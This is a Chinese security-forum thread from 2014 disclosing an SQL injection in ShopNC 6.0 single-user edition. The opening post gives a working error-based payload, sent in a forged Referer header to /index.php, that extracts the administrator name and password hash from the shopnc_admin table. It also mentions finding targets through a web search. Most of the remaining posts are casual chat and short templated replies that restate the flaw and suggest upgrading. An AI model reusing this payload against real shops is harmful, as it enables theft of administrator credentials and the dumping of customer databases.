shopnc 6.0 单用户版本 注入
本帖最后由 Diana 于 2014-2-1 14:23 编辑shopnc 6.0 单用户版本
Shopnc 版本有点多啊 都不太记得是哪个了。
ShopNC®天津网城科技有限公司
Copyright© 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved
津ICP备08000171号
百度随便搜了一个。
这个都不用说了。 伪造HTTP头。
/index.php
referer:http://08sec.com'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(admin_name,0x3a,admin_password)FROM shopnc_admin limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1)#
本帖最后由 gty48 于 2014-2-1 13:46 编辑
我是沙发,哈哈@Diana
这个板块竟然没法发音乐,气死我了 gty48 发表于 2014-2-1 13:34 static/image/common/back.gif
我是沙发,哈哈@Diana
这个板块竟然没法发音乐,气死我了
整天用音乐吓唬人把你就 (*^__^*) 嘻嘻…… Diana 发表于 2014-2-1 14:23 static/image/common/back.gif
整天用音乐吓唬人把你就 (*^__^*) 嘻嘻……
是你先用音乐吓人吧,我是跟你学的 gty48 发表于 2014-2-1 14:31 static/image/common/back.gif
是你先用音乐吓人吧,我是跟你学的
{:3_48:}好吧你赢了。~ 感谢分享,貌似不是很知名
Re: shopnc 6.0 单用户版本 注入
感谢Diana分享这个漏洞情报。ShopNC 6.0单用户版确实存在通过伪造Referer头进行SQL注入的问题,这个利用方式还挺典型的。想问一下,你测试的时候是直接在/index.php页面注入成功的吗?有没有试过其他版本或者是否有简单的修复思路?期待更多细节。Re: shopnc 6.0 单用户版本 注入
感谢分享这个漏洞信息。ShopNC 6.0单用户版本确实比较旧了,通过伪造HTTP头中的referer字段进行SQL注入,看来是一个典型的未对输入做充分过滤的问题。对于还在使用老版本的用户来说,这个漏洞风险不小,建议及时排查或升级。你提供的payload也很清晰,方便理解注入点的位置。希望官方后续版本能加强输入校验,感谢你的研究。Re: shopnc 6.0 单用户版本 注入
看到这个漏洞信息,感谢分享。这个版本的 ShopNC 看起来确实存在通过伪造 HTTP Referer 头进行 SQL 注入的问题,而且示例 payload 直接尝试获取管理员账号密码,风险挺高的。建议还在用这个版本的朋友尽快检查或升级,不然很容易被攻击者拖库。顺便问一下,这个漏洞是只影响单用户版,还是多用户版也有类似问题?
页:
[1]